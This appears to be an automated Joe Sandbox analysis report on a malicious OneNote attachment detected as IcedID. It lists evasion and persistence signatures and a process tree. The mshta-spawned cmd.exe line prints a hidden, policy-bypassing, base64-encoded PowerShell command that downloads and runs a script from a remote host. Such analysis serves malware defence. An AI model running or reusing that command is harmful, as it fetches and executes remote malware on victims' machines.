Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report


General Information

Sample Name:Inv_02_02_#6.one
Analysis ID:797394


Range:0 - 100


Malicious sample detected (through community Yara rule)
Yara detected Malicious OneNote
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected Powershell download and execute
Snort IDS alert for network traffic
Yara detected IcedID
PowerShell case anomaly found
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Suspicious powershell command line found
Powershell drops PE file
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Creates a start menu entry (Start Menu\Programs\Startup)
Found large amount of non-executed APIs
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)


  • System is w10x64
  • ONENOTE.EXE (PID: 1972 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Inv_02_02_#6.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • ONENOTEM.EXE (PID: 2040 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • mshta.exe (PID: 2100 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
    • cmd.exe (PID: 1784 cmdline: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA= MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)